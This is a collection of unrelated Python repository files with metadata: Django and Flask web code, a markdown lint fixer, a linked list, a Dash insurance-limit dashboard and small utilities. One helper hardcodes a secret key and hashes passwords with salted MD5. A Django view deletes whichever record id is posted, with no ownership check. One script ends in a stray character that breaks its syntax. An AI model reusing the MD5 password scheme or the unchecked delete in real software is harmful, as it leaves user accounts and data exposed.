74b2f9658f3fd47aaf255febf2852263c6ec19e0
/takerest/src/helpers/test-data-gen/src/lib/vendors/pairs/main/pairwisepy/__init__.py
388cb2859d0ac5d57e2ce7a71e3661e25c431ed3
[]
no_license
upworka0/restio
bf47db136e884c72b061962e3973546a4bdd78c7
9f22fc6513fefd6c98738b0ea016abfec7c437cb
refs/heads/master
2023-03-05T00:23:12.243382
2021-10-01T01:49:01
2021-10-01T01:49:01
203,429,128
1
0
null
2023-03-01T19:12:22
2019-08-20T18:07:32
JavaScript
UTF-8
Python
false
false
65
py
# Author: Nagaraj # Date: 6/5/18 from .pairwise import AllPairs
[ "upworka0@gmail.com" ]
upworka0@gmail.com
c1a8889953ba8a96272a8c3b6ed202d72807d980
53365da025bf6a2b0b9dda4554836836409f65fc
/django_fullstack/semi_restful_tv_shows/main/views.py
6a2ecdecc361fa3dee8684b594a136391e8c51fb
[]
no_license
jdinthetrees/pythonstack
d837d2cc173cd3f3a3bf6daf984ae0672d7f86e4
e41ac65ea34a0296260b338d3928f1d81b3725a7
refs/heads/master
2023-02-12T06:45:18.486565
2021-01-12T21:24:41
2021-01-12T21:24:41
329,112,787
0
0
null
null
null
null
UTF-8
Python
false
false
2,307
py
from django.shortcuts import render, HttpResponse, redirect
from django.contrib import messages
from .models import Show


def index(request):
    """Render the list of all shows.

    FIX: removed a debug ``print(Show.objects.get(id=6))`` that crashed
    (DoesNotExist) whenever row 6 was absent, and a pointless per-row loop
    that rebuilt the same context dict and left ``context`` undefined when
    the table was empty (NameError at render time).
    """
    context = {
        'all_the_shows': Show.objects.all(),
    }
    return render(request, "index.html", context)


def showdescription(request, show_id):
    """Render the detail page for one show."""
    context = {
        'this_show': Show.objects.get(id=show_id),
    }
    return render(request, "showdescription.html", context)


def showedit(request, show_id):
    """Render the edit form pre-filled with the show's current values."""
    context = {
        'this_show': Show.objects.get(id=show_id),
    }
    return render(request, "showedit.html", context)


def showupdate(request, show_id):
    """Validate and persist an edit; on failure redirect back to the form
    with flash messages.  The form posts the target id as 'this_show.id'.
    """
    errs = Show.objects.show_validator(request.POST)
    if len(errs) > 0:
        for msg in errs.values():
            messages.error(request, msg)
        return redirect(f"/shows/{request.POST['this_show.id']}/edit")
    else:
        one_show = Show.objects.get(id=request.POST['this_show.id'])
        one_show.title = request.POST['title']
        one_show.network = request.POST['network']
        one_show.description = request.POST['description']
        one_show.save()
        return redirect(f"/shows/{request.POST['this_show.id']}")


def showdelete(request, show_id):
    """Delete a show and return to the list.

    NOTE(review): the row actually deleted comes from the posted
    'this_show.id' field, not the ``show_id`` URL parameter — the URL
    lookup only serves as an existence check.  Confirm this asymmetry is
    intended before relying on it.
    """
    Show.objects.get(id=show_id)  # 404-style guard: raises if the URL id is stale
    one_show = Show.objects.get(id=request.POST['this_show.id'])
    one_show.delete()
    return redirect("/shows")


def shownew(request):
    """Render the empty 'add a show' form."""
    return render(request, "showadd.html")


def showadd(request):
    """Validate and create a new show; on failure redirect back with flash
    messages, on success redirect to the new show's detail page.
    """
    errs = Show.objects.show_validator(request.POST)
    if len(errs) > 0:
        for msg in errs.values():
            messages.error(request, msg)
        return redirect(f"/shows/new")
    else:
        Show.objects.create(
            title=request.POST['title'],
            network=request.POST['network'],
            release_date=request.POST['release_date'],
            description=request.POST['description'],
        )
        last_show = Show.objects.last().id
        return redirect(f"/shows/{last_show}")
[ "jollyjohndang@gmail.com" ]
jollyjohndang@gmail.com
8986dc358b507dacb7c4a4416d0697035d394d40
9c51b666e9c6db491af0fe67b58dd1335f77088e
/tools/markdownlint-fixer.py
05d0e8bcb4f9d491480e15c28ff52a5a5084255f
[ "CC-BY-4.0" ]
permissive
undergroundwires/Azure-in-bullet-points
aa15ee480d6fe5a7f057fda03e454e70e5118154
9743b1d81a49fa7c28d93a4ced21db30cef28765
refs/heads/master
2023-08-31T23:38:30.500859
2023-08-18T13:41:37
2023-08-18T13:41:37
175,283,225
1,052
470
CC-BY-4.0
2023-08-18T13:41:39
2019-03-12T19:31:20
Python
UTF-8
Python
false
false
2,781
py
'''
Not tested for generic usage.
It fixes following lint issues in md files:
MD007 - Unordered list indentation
MD009 - No trailing whitespaces
MD004 - Unordered list style
MD002 - Headings should be surrounded by blank lines
'''
import math, os.path, sys, argparse

parser = argparse.ArgumentParser(description="markdownlint fixer")
parser.add_argument('-i', help='File to fix', dest='filename',
                    type=argparse.FileType('r', encoding='UTF-8'), required=True)
args = parser.parse_args()
path = str(args.filename.name)
new_lines = []


def count_leading_whitespaces(text):
    """Number of leading space characters in text."""
    return len(text) - len(text.lstrip(' '))


with open(path, 'r', encoding='UTF-8') as file:
    lines = file.readlines()
    for line_index, line in enumerate(lines):
        # MD007 - Unordered list indentation: halve the leading spaces,
        # rounding odd counts up (and warning about them).
        if line.startswith(' '):
            total_white_spaces = count_leading_whitespaces(line)
            line = line.lstrip(' ')
            total_white_spaces = total_white_spaces / 2
            if int(total_white_spaces) != total_white_spaces:
                normalized = math.ceil(total_white_spaces)
                print(f'Bad total white spaces: {str(total_white_spaces)} normalized to {str(normalized)}. Line: "{line}"')
                total_white_spaces = normalized
            total_white_spaces = int(total_white_spaces)
            for i in range(total_white_spaces):
                line = ' ' + line
        # MD009 - No trailing whitespaces (preserve the newline if present).
        text_part = line.split('\n')[0].rstrip(' ')
        if line.endswith('\n'):
            line = f'{text_part}\n'
        else:
            line = f'{text_part}'
        # MD004 - Unordered list style: normalize '-' bullets to '*',
        # re-applying the original indentation afterwards.
        if line.lstrip().startswith('-'):
            total_white_spaces = 0
            while line.startswith(' '):
                total_white_spaces += 1
                line = line[1:len(line)]
            line = "*" + line[1:len(line)]
            while total_white_spaces != 0:
                line = ' ' + line
                total_white_spaces -= 1
        # MD002 - Headings should be surrounded by blank lines: insert a
        # blank line before the next heading, or after this one.
        if line_index < len(lines) - 1:
            next_line = lines[line_index + 1].lstrip(' ')
            if next_line.startswith('#') and line != '\n':
                line = f'{line}\n'
            else:
                if line.lstrip().startswith("#") and next_line != '\n':
                    line = f'{line}\n'
        new_lines.append(line)

filename, file_extension = os.path.splitext(path)
# FIX: write to "<original stem>_fixed<ext>" — the original assigned a
# literal placeholder string instead of using the computed `filename`.
output_path = f'{filename}_fixed{file_extension}'
with open(output_path, 'w', encoding='UTF-8') as fixed_file:
    fixed_file.writelines(new_lines)
[ "undergroundwires@users.noreply.github.com" ]
undergroundwires@users.noreply.github.com
4c9659fd162014d48f2f652a5dcc598705d45fbb
3c56f54ec7e6cade93b5c988cba531e8a2edd453
/Day5/SF21-Flask-Advanced/wtforms/forms.py
51a054063629ee6fc5e406bb584f9f4a84aca901
[ "MIT" ]
permissive
JuJu2181/Learning_Flask
ae6addeedea29df0d19ed272d68f37d945bda6e4
f9f46cac743323a1821ed214dd512ef337a804f1
refs/heads/master
2023-08-25T21:44:41.931317
2021-07-15T07:55:07
2021-07-15T07:55:07
383,996,071
0
0
null
null
null
null
UTF-8
Python
false
false
646
py
from flask_wtf import FlaskForm
from wtforms import IntegerField, StringField, SubmitField
from wtforms.validators import InputRequired, NumberRange


class NameForm(FlaskForm):
    """Simple form with a single required name field."""
    # InputRequired rejects empty submissions with a custom message.
    name = StringField("Full Name",validators=[InputRequired("Please Add a Name")]) # add validation here
    submit = SubmitField("Submit")


class NameFormSecond(FlaskForm):
    """Form collecting a name plus an age restricted to 13-60."""
    name = StringField("Full Name", validators=[InputRequired()])
    age = IntegerField(
        "Age",
        validators=[
            InputRequired(),
            # NumberRange bounds are inclusive.
            NumberRange(min=13, max=60, message="Age must be between 13 and 60."),
        ],
    )
    submit = SubmitField("Submit")
[ "anishshilpakar8@gmail.com" ]
anishshilpakar8@gmail.com
7046f96277b3a24fa4c120d9e42ebb229ccaad4a
fe7763e194be94c402482619c0111fcaca1ef7f6
/tutorial/snippets/permissions.py
a42b29204436ae53823a6a8aff8bf895527515ec
[ "MIT" ]
permissive
antoniocarlosortiz/django-rest-framework-sample
1fc8b11af2aa1cacfbbc2c3363e097262eec7aee
45ff0213b4a74566c8571c498c67adf66b420d3e
refs/heads/master
2021-01-01T05:18:51.457373
2016-04-23T18:28:12
2016-04-23T18:28:12
56,934,397
0
1
null
null
null
null
UTF-8
Python
false
false
474
py
from rest_framework import permissions


class IsOwnerOrReadOnly(permissions.BasePermission):
    """
    Custom permission to only allow owners of an object to edit it.
    """

    def has_object_permission(self, request, view, obj):
        """Allow safe methods for everyone; writes only for the owner.

        Assumes `obj` has an `owner` attribute comparable to request.user.
        """
        # Read permissions are allowed to any request.
        # so we'll always allow GET, HEAD or OPTIONS requests.
        if request.method in permissions.SAFE_METHODS:
            return True

        return obj.owner == request.user
[ "ortizantoniocarlos@gmail.com" ]
ortizantoniocarlos@gmail.com
b81fbe136d30d1cc561a5d652413f0cc5ab24af0
48828cdb69093b261f134c664cad7bdb1bf01b10
/_config/hash.py
324c90cd5ea71c75011d82a92978cef837f32323
[]
no_license
404neko/PageCat
cb2178efee7f09d5f8d412f42810b4d4a006f559
1deda59694624b3048754fdc76aeae286cd8a679
refs/heads/master
2021-01-17T17:35:26.372506
2016-05-02T10:56:13
2016-05-02T10:56:13
52,928,350
0
0
null
null
null
null
UTF-8
Python
false
false
203
py
import hashlib

# Secret key used elsewhere by the Flask app for session signing.
flask_secret_key = '233'
# Module-level default salt (callers pass their own salt to uhash).
salt = '2333'


def uhash(password, salt):
    """Return the salted MD5 hex digest of *password*.

    The salt is spliced in after the first character of the password; this
    legacy scheme is kept so hashes already stored remain valid.

    FIX: hashlib requires bytes under Python 3 — the original passed a str
    to ``update`` and raised TypeError.  Also handles the empty password
    (the original raised IndexError on ``password[0]``) by hashing the
    salt alone.

    NOTE(review): MD5 is cryptographically weak; migrate to
    ``hashlib.pbkdf2_hmac`` once stored hashes can be re-hashed.
    """
    if password:
        pre_hash = password[0] + salt + password[1:]
    else:
        pre_hash = salt
    return hashlib.md5(pre_hash.encode('utf-8')).hexdigest()
[ "404neko@gmail.com" ]
404neko@gmail.com
5cace677c0248096c96561d057f04dc8d7c24177
c96f37e005b5dc6ef96ef871222a36c6920102e6
/MotionFunctions.py
d720bf1a8499891d8b35362de3a874f4f0573848
[]
no_license
shrutisub/robot
eef31ba3c1d396e699ce37fecd45fa1a74859739
a70e246a078c02d8085b9eed7d8d45acb5a5351f
refs/heads/master
2021-08-30T07:23:14.971463
2017-12-16T18:15:29
2017-12-16T18:15:29
114,481,019
0
0
null
null
null
null
UTF-8
Python
false
false
1,045
py
import numpy as np import time def PTPtoConfiguration(start_cfg, target_cfg, motiontype): """PTP path planning :param start_cfg: Current axis angle of the robot :type start_cfg: array of floats :param target_cfg: Target angle of the robot :type target_cfg: array of floats :param motiontype: Type of motion (asynchronous, synchronous, fully synchronous) :type motiontype: int :returns: Array containing the axis angles of the interpolated path :rtype: matrix of floats """ trajectory = np.empty([100, 6]) #TODO: Implement PTP (Replace pseudo implementation with your own code)! Consider the max. velocity and acceleration of each axis diff = target_cfg - start_cfg delta = diff / 100.0 for i in xrange(100): trajectory[i] = start_cfg + (i*delta) trajectory[99] = target_cfg return trajectory def Move(robot, trajectory): for i in range(trajectory.shape[0]): robot.SetDOFValues(trajectory[i]) time.sleep(0.01)
[ "noreply@github.com" ]
noreply@github.com
c412835e863548366c31fa22434e45e614059113
56278a6e508ce1a282270f90f1cd9984edd14965
/tests/test_validation/_test_utils.py
ae430d81167f643c218fc773e99d0fc4cf3c2974
[ "MIT" ]
permissive
gc-ss/py-gql
3d5707938e503dc26addc6340be330c1aeb2aa76
5a2d180537218e1c30c65b2a933fb4fe197785ae
refs/heads/master
2023-04-10T05:21:24.086980
2020-04-01T14:18:20
2020-04-01T14:18:20
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,463
py
# -*- coding: utf-8 -*- from py_gql._string_utils import dedent from py_gql.lang import parse from py_gql.validation import validate_ast from py_gql.validation.validate import SPECIFIED_RULES, default_validator def _ensure_list(value): if isinstance(value, list): return value else: return [value] def assert_validation_result( schema, source, expected_msgs=None, expected_locs=None, checkers=None ): # Prints are here so we can more easily debug when running pytest with -v expected_msgs = expected_msgs or [] expected_locs = expected_locs or [] print(source) result = validate_ast( schema, parse(dedent(source), allow_type_system=True), validators=[ lambda s, d, v: default_validator( s, d, v, validators=(checkers or SPECIFIED_RULES) ) ], ) errors = result.errors msgs = [str(err) for err in errors] locs = [[node.loc for node in err.nodes] for err in errors] print(" [msgs] ", msgs) print(" [locs] ", locs) assert msgs == expected_msgs if expected_locs: assert locs == [_ensure_list(l) for l in expected_locs] def assert_checker_validation_result( checker, schema, source, expected_msgs=None, expected_locs=None ): assert_validation_result( schema, source, expected_msgs=expected_msgs, expected_locs=expected_locs, checkers=[checker], )
[ "c.lirsac@gmail.com" ]
c.lirsac@gmail.com
a30f1f5184e240fdb168d288874791f7260c7029
cdbb11473dc8d34767a5916f9f85cb68eb2ca3f2
/core/helpers.py
a9cf1b2ad8c669f8aac1b940187d7a46adde3660
[]
no_license
skyride/evestats
fb2a1a248952771731dcfecadab7d02b1f08cd4b
4bd2153f65c084b478272513733dcc78f9a0ef98
refs/heads/master
2020-03-23T13:50:19.216870
2018-08-05T19:19:47
2018-08-05T19:19:47
141,640,834
0
0
null
null
null
null
UTF-8
Python
false
false
578
py
from sde.models import Type def generate_breadcrumb_trail(marketgroup): def recurse(node): """Return an list containing the path to this trail""" if isinstance(node, dict): return [] elif isinstance(node, Type): return [*recurse(node.market_group), node] elif node.parent is None: return [node] else: return [*recurse(node.parent), node] return [ { "name": "Market", "root": True }, *recurse(marketgroup) ]
[ "adam.findlay@mercurytide.co.uk" ]
adam.findlay@mercurytide.co.uk
5b625b525d193a50347763599fcc98a42ce55dcc
732c63fef3f138d22eb3c39dff6bdbd797a9bf75
/insertion-del-traversing.py
15ad98a768c0f436b7c666c69d05efbe0005dcce
[]
no_license
yagavardhini/class-and-objects
8bb2c69f35553635c05a74c8b1ab5057bd7c8ee7
4235a45c985272cbdc1456c033551e0c77b46a2a
refs/heads/master
2020-07-02T03:49:23.553965
2019-08-15T08:53:37
2019-08-15T08:53:37
201,407,418
0
0
null
null
null
null
UTF-8
Python
false
false
837
py
class Node: def __init__(self,data): self.data=data self.nextt=None class SLL: def __init__(self): self.head=None def insertAtBeg(self,data): temp=Node(data) temp.nextt=self.head self.head=temp def delAtBeg(self): temp=self.head self.head=self.head.nextt temp.nextt=None def printList(self): temp=self.head while temp!=None: print(temp.data,"==>",end='') temp=temp.nextt print("None") obj=SLL() ch=0 while ch!=4: print("Linked list implementation\n","1.Insertion at begining 2. Deletion 3. Print Llist 4. Exit") ch=int(input()) if ch==1: print("enter value of the node") data=input() obj.insertAtBeg(data) obj.printList() elif ch==2: obj.delAtBeg() obj.printList() elif ch==3: obj.printList() ©
[ "noreply@github.com" ]
noreply@github.com
9fa46ad09d0359bf5046afbe894f2fc153a4e49b
a9de0373f6275a9d6c74701f43306842c1cab60e
/singleInstance.py
325394d63a31d04aa4713cf79e8e8993ed9f4c31
[]
no_license
carrotshub/ExDemo
3bf0c2f82192186a81643232457e4b9776c1ed9a
00a12dac0175726078e78f9868f98391eaf7fb6c
refs/heads/master
2020-04-13T01:22:08.152531
2019-01-09T13:10:39
2019-01-09T13:10:39
162,871,886
0
0
null
null
null
null
UTF-8
Python
false
false
751
py
# -*- coding: utf8 -*- # 使用装饰器实现单例模式 # 第一种方法类作为装饰器 class Single(object): def __init__(self,cls): self._cls = cls self._instances = None def __call__(self, *args, **kwargs): if not self._instances: self._instances = self._cls(*args) return self._instances @Single class A(object): def __init__(self,name): self.name = name a = A('zhangsan') b = A('lisi') print(a is b) # 第二种,使用函数作为装饰器 def single1(cls): s = [] def wrapper(*args, **kwargs): if not s: s.append(cls(*args, **kwargs)) print(args) return s return wrapper @single1 class B(object): def __init__(self, name): self.name = name a1 = B('zhangsam') b1 = B('BOb') print(a1 is b1)
[ "1398141580@qq.com" ]
1398141580@qq.com
913f443dfbaa96309422d8d52d60c558de4b9c33
2f1ac001742fa3e117e1b900a26ac0afb97f8967
/app.py
6654b10d9a5d022143a5903a8806571608b92145
[]
no_license
debugDoug/carrier_limit_dash
f67411df48c24bdb609211542146dfd936800138
348830bbb4c4e7f9043008f8b946f97084501830
refs/heads/master
2022-11-11T01:11:24.206897
2020-06-25T21:45:59
2020-06-25T21:45:59
275,017,556
1
0
null
null
null
null
UTF-8
Python
false
false
16,081
py
# -*- coding: utf-8 -*- """ Created on Sun Jun 21 08:11:43 2020 @author: 1197058 """ import dash from dash.dependencies import Input, Output import dash_core_components as dcc import dash_html_components as html import pandas as pd import numpy as np import dash_table import plotly.express as px #hey def generate_table(dataframe, max_rows=100): return html.Table([ html.Thead( html.Tr([html.Th(col) for col in dataframe.columns]) ), html.Tbody([ html.Tr([ html.Td(dataframe.iloc[i][col]) for col in dataframe.columns ]) for i in range(min(len(dataframe), max_rows)) ]) ]) #%% Load in IFCL df = pd.read_excel(r'M:\Workspace\Doug\Carrier Limit Tracking\Data\DailyWeekly\062220_Inforced Carrier Limit.xlsx') # drop Centauri df = df[df['Carrier Display Name'] != 'Centauri Specialty Insurance Company'] # drop Channel and Lloyds - DBD Slip (100% Channel) (as per Craig) and remove Harco (counted in iPartners report) #df = df[df['Carrier Display Name'] != 'Argo Re'] #df = df[df['Carrier Display Name'] != 'Ariel'] df = df[df['Carrier Display Name'] != 'Channel-DBD'] df = df[df['Carrier Display Name'] != 'Lloyds - DBD Slip (100% Channel)'] df = df[df['Carrier Display Name'] != 'Harco National Insurance Company'] df = df[df['Carrier Display Name'] != 'Exclude'] # change S4242 Re to Syndicate 4242 df['Carrier Display Name'].replace("S4242 Re", "Syndicate 4242", inplace=True) #change Exclude to QBE #df['Carrier Display Name'].replace("Exclude","QBE", inplace=True) # change Crum & Forster_PBU to Crum and Forster df['Carrier Display Name'].replace("Crum & Forster_PBU","Crum and Forster", inplace=True) # change RenRe_PBU to RenRe df['Carrier Display Name'].replace("RenRe_PBU","RenRe", inplace=True) # change NF&M and BHSIC to Berkshire Hathaway df['Carrier Display Name'].replace("NF&M","Berkshire Hathaway", inplace=True) df['Carrier Display Name'].replace("BHSIC","Berkshire Hathaway", inplace=True) # change Ariel and Argo Re df['Carrier Display Name'].replace("Ariel", "Other", 
inplace=True) df['Carrier Display Name'].replace("Argo Re", "Other", inplace=True) # create macrozone column df['Microzone'].value_counts() df['Microzone'].isna().sum() df['Microzone'].fillna('UNKNOWN', inplace=True) microMacro = pd.read_excel(r'M:\Workspace\Doug\Carrier Limit Tracking\Data\DailyWeekly\MicroToMacro.xlsx') microMacro = dict(zip(microMacro.Microzone, microMacro.Macrozone)) df['Macrozone'] = df['Microzone'].map(microMacro) df.Macrozone.value_counts() check = df[df['Macrozone'].isna()] # create segment column def segment (row): if row['Carrier Display Name'] == 'Harco National Insurance Company': return 'HBU' if row['Carrier Display Name'] == 'Syndicate 2288_Harco Auth Participant': return 'HBU' elif row['Source System'] == 'Epicenter': return 'PBU' else: return 'MMBU' df['Segment'] = df.apply(lambda row: segment(row), axis=1) # print(df['Segment'].value_counts()) # change 2288 HBU name df['Carrier Display Name'].replace("Syndicate 2288_Harco Auth Participant", "Syndicate 2288", inplace=True) # create state col df['State'] = df.Microzone.str[:2] df['State'] = df['State'].astype(str) # create peril col wind_zones = ['AL','FL','GA','HI','LA','MA','MS','NC','NJ','NY','TX'] quake_zones = ['CA','OR','WA'] def peril (row): if row['Policy Number'][0] == 'A': # doesn't appear to exist anymore return 'App' if (row['Policy Number'][0] == 'E') & (row['State'] in (wind_zones)) : # EQX polcies, was NAC now HU return 'HU' if (row['Policy Number'][0] == 'E') & (row['State'] in (quake_zones)) : # EQX polcies, was NAC now EQ return 'EQ' if row['Policy Number'][:2] == 'IQ': # was QBE Excess now HU return 'HU' if row['Policy Number'][:2] == 'IC': # was FL-Admitted now HU return 'HU' if row['Policy Number'][5] == '0': return 'EQ' if row['Policy Number'][5] == '6': return 'HU' if row['Policy Number'][5] == '8': # was CGL now HU return 'HU' if row['Policy Number'][5] == '9': # was AOP now HU return 'HU' df['Peril'] = df.apply(lambda row: peril(row), axis=1) 
df['Peril'].value_counts() # create Month column df['Month-Year'] = pd.to_datetime(df['Policy Effective Date']).dt.to_period('M') df['Month-Year'] = df['Month-Year'].dt.strftime('%b-%Y') # create New/Renewal column def new_renew (row): if row['Policy Number'][-1] != '0': return 'Renewal' else: return 'New' df['New/Renewal'] = df.apply(lambda row: new_renew(row), axis=1) # print(df['New/Renewal'].value_counts()) ### check for duplicates ### df['Check_pol'] = df['Policy Number'].str[:16] # print(df['Check_pol'].nunique()) # print(df['Policy Number'].nunique()) unique = pd.DataFrame(df.groupby('Check_pol')["Policy Effective Date"].nunique()).reset_index() # merge grouped back to main df df = pd.merge(df, unique, how='left', on="Check_pol") # get df of duplicates (unique policy dates = 2) duplicates = df[df['Policy Effective Date_y']==2] # difference b/w expiring and renewing True=2018 duplicates.groupby([(duplicates["Policy Effective Date_x"] >= '2018-01-01') & (duplicates["Policy Effective Date_x"] <= '2019-12-31')])["Carrier Limit"].sum() # check values and drop duplicates from the df by finding rows with PED_y ==2 AND PED <= '2018-12-31' duplicates.groupby(duplicates['Policy Effective Date_x'].dt.year)['Policy Effective Date_y'].value_counts() df = df.drop(df[(df["Policy Effective Date_y"] == 2) & (df["Policy Effective Date_x"] <= '2019-12-31')].index) # get expiring/old pol number def getExpNumber(row): if row['New/Renewal'] == 'Renewal': val = row['Policy Number'][-2:] val = int(val) - 1 val = '0' + str(val) base_pol = row['Policy Number'][:-2] old_pol = base_pol + val return old_pol else: return 'None' df['Old Policy Number'] = df.apply(getExpNumber, axis=1) #%% generate some charts as tests df2 = df.groupby(['Carrier Display Name','Segment'])[['Carrier Limit']].sum() df2.reset_index(inplace=True) df2 = df2[df2['Segment'] != 'HBU'] # graph fig = px.bar(df2, x='Carrier Display Name', y='Carrier Limit', hover_data=['Segment'],color='Carrier Limit') df3 = 
df[df['Carrier Display Name'] == 'Syndicate 4242'] df3 = df3.groupby('Policy Effective Date_x')[['Carrier Limit']].sum() df3.reset_index(inplace=True) fig2 = px.line(df3, x='Policy Effective Date_x', y='Carrier Limit') df4 = df.groupby(['Carrier Display Name','Segment'])[['Carrier Limit']].sum() df4.reset_index(inplace=True) df4 = df4[df4['Segment'] != 'HBU'] df4['Carrier Limit'] = df4['Carrier Limit'].apply(lambda x : "{:,}".format(x)) df5 = df[df['Segment'] != 'HBU'] df5['Month-Year'] = pd.to_datetime(df5['Month-Year']) summary_pivot = pd.pivot_table(data=df5, values='Carrier Limit', index=['Carrier Display Name','Segment'], columns='Month-Year', aggfunc=np.sum, fill_value=0, margins=True) summary_pivot.reset_index(inplace=True) old_colNames = list(summary_pivot.columns[2:-1]) new_colNames = [] for i in summary_pivot.columns[2:-1]: i = i.strftime("%m-%Y") new_colNames.append(i) col_rename_dict = {i:j for i,j in zip(old_colNames,new_colNames)} summary_pivot.rename(columns=col_rename_dict, inplace=True) summary_pivot.columns = summary_pivot.columns.astype(str) #%% # CARRIER TAB df_carrier = df df_carrier['Carrier Limit'] = df_carrier['Carrier Limit'].astype(float) df_carrier = df.pivot_table(values='Carrier Limit', index=['Month-Year','Carrier Display Name'], aggfunc = sum, fill_value=0) df_carrier.reset_index(inplace=True) df_carrier['Month-Year'] = pd.to_datetime(df_carrier['Month-Year']) df_carrier = df_carrier.sort_values(by='Month-Year') fig_Carrier = px.line(df_carrier, x='Month-Year', y='Carrier Limit', color='Carrier Display Name') fig_Carrier.update_xaxes(rangeslider_visible=True, rangeselector=dict( buttons=list([ dict(count=1, label="1m", step="month", stepmode="backward"), dict(count=6, label="6m", step="month", stepmode="backward"), dict(count=1, label="YTD", step="year", stepmode="todate"), dict(count=1, label="1y", step="year", stepmode="backward"), dict(step="all") ]))) # get sum of limit for each carrier by segment and macrozone df_agg = 
df.groupby(['Carrier Display Name','Segment','Macrozone','Peril'])[['Carrier Limit']].sum() df_agg.reset_index(inplace=True) df_agg['Carrier Limit'] = df_agg['Carrier Limit'].apply(lambda x : "{:,}".format(x)) # create watch zones column watch_zones = ['CA Gtr Los Angeles','CA Gtr San Francisco','CA N Central Coast','CA N Coast','WA Washington', 'OR Oregon','FL Tri County','FL Panhandle','FL Southwest','FL Inland','FL West', 'FL East Coast','TX N Texas'] df_agg['Watch Zone'] = df_agg['Macrozone'].apply(lambda x: 'Yes' if x in watch_zones else 'No') available_carriers = df_agg['Carrier Display Name'].unique() available_segs = df_agg['Segment'].unique() available_mz = df_agg['Macrozone'].unique() available_wz = df_agg['Watch Zone'].unique() #%% # MACROZONE TAB watch_zones = ['CA Gtr Los Angeles','CA Gtr San Francisco','CA N Central Coast','CA N Coast','WA Washington', 'OR Oregon','FL Tri County','FL Panhandle','FL Southwest','FL Inland','FL West', 'FL East Coast','TX N Texas'] df_macrozone = df[(df['Macrozone'].isin(watch_zones)) & (df['Segment'] != 'HBU')] df_macrozone = df_macrozone.groupby(['Macrozone','Microzone','Carrier Display Name','Segment'])[['Carrier Limit']].sum() df_macrozone.reset_index(inplace=True) fig_WZ = px.bar(df_macrozone, x='Macrozone', y='Carrier Limit', color='Carrier Display Name', hover_data=['Segment','Microzone']) #%% # APP LAYOUT & STRUCTURE external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets=external_stylesheets) app.layout = html.Div(children=[ dcc.Tabs([ dcc.Tab(label='All ICAT', children=[ html.H1(children='Carrier Limit Tracking!'), html.Div(children=''' Dash: A web application framework for Python. 
'''), html.H2(children='Graph of Commercial Inforce Limit'), dcc.Graph( id='example-graph', figure=fig ), html.H3(children='Graph of s4242 Limit'), dcc.Graph(figure=fig2), html.H4(children='Commercial Carriers Limit'), #generate_table(df4), dash_table.DataTable( id='practice_carrier_table', columns=[{"name": i, "id": i} for i in summary_pivot.columns], data = summary_pivot.to_dict('records'), ) #generate_table(df_carrier) ]), ## CARRIER TAB dcc.Tab(label='Carriers', children=[ html.H1(children='Carrier Limit'), # dash_table.DataTable( # id='practice_carrier_table', # columns=[{"name": i, "id": i} for i in df_carrier.columns], # data = df_carrier.to_dict('records'), # ) #generate_table(df_carrier) html.H2(children='Carrier Limit by Policy Inception Date'), html.Div(children='''Shows When Limit was Bound ''' ), # graph of all carriers and their limit by Pol Inception date dcc.Graph(figure=fig_Carrier), # dropdown for carrier name html.Div(children='''Select Carrier(s)'''), dcc.Dropdown( id='carrier_aggs_dd', options=[{'label':i, 'value':i} for i in available_carriers], value=[], multi=True ), # dropdown for segment html.Div(children='''Select Segment(s)'''), dcc.Dropdown( id='carrier_aggs_dd_segment', options=[{'label':i, 'value':i} for i in available_segs], value=[], multi=True ), # dropdown for Watch Zones html.Div(children='''Filter to Watch Zones or Rest'''), dcc.Dropdown( id='carrier_aggs_dd_wz', options=[{'label':i, 'value':i} for i in available_wz], value=[], multi=True ), # dropdown for macrozone html.Div(children='''Select Macrozone(s)'''), dcc.Dropdown( id='carrier_aggs_dd_mz', options=[{'label':i, 'value':i} for i in available_mz], value=[],#'CA Gtr Los Angeles','FL Tri County', 'TX N Texas'], multi=True ), # dash_table.DataTable( # id='carrier_aggs', # columns=[{"name": i, "id": i} for i in df_agg.columns], # data=df_agg.to_dict('records'), # ) html.Div(children=''' '''), dash_table.DataTable( id='carrier_aggs', columns = [{"name": i, "id": i,} for i in 
(df_agg.columns)]) ]), dcc.Tab(label='Macrozones', children=[ html.H1(children='Limit by Macrozone'), html.Div(children=''' Limit in Watch Zones (PML Drivers) '''), dcc.Graph(figure=fig_WZ) ]) ]) ]) @app.callback(Output('carrier_aggs', 'data'), [Input('carrier_aggs_dd', 'value'), Input('carrier_aggs_dd_segment', 'value'), Input('carrier_aggs_dd_mz', 'value'), Input('carrier_aggs_dd_wz', 'value')]) def update_rows(selected_carriers, selected_segs, selected_mz, selected_wz): carriers = list(selected_carriers) segs = list(selected_segs) mz = list(selected_mz) wz = list(selected_wz) if len(selected_carriers) >= 1: dff_agg = df_agg[df_agg['Carrier Display Name'].isin(carriers)] else: dff_agg = df_agg if len(selected_segs) >= 1: dfF_agg = dff_agg[dff_agg['Segment'].isin(segs)] else: dfF_agg = dff_agg if len(selected_mz) >= 1: dFF_agg = dfF_agg[dfF_agg['Macrozone'].isin(mz)] else: dFF_agg = dfF_agg if len(selected_wz) >= 1: dFFF_agg = dFF_agg[dFF_agg['Watch Zone'].isin(wz)] else: dFFF_agg = dFF_agg return dFFF_agg.to_dict('records') if __name__ == '__main__': app.run_server(debug=True) # colnames='Syndicate 2288' # test = df[df['Carrier Display Name'].isin(colnames)] # df4 = df[df['Segment'] != 'HBU'] # df4['Month-Year'] = pd.to_datetime(df4['Month-Year']) # summary_pivot = pd.pivot_table(data=df4, values='Carrier Limit', index=['Carrier Display Name','Segment'], # columns='Month-Year', aggfunc=np.sum, fill_value=0) # print(summary_pivot.style.format('{0:,.2f}').hide_index()) # summary_pivot.info() # df4.info()
[ "noreply@github.com" ]
noreply@github.com
bb6643f96de8854e77e2affffa552d014fb97e44
0d0d63e25b9afbf5b45880c747d758763829d01a
/ramseymodel.py
51d66cf8b5baed520aeea68bfcd78191a038d54a
[]
no_license
ecotyper/Ramseymodel
4056867ed0b887d0a434d20a6e35b29f7acff391
cf4e212df70dd36eb3d31187df3442ef3173c48d
refs/heads/master
2023-04-27T02:40:35.289041
2018-06-18T22:55:59
2018-06-18T22:55:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,400
py
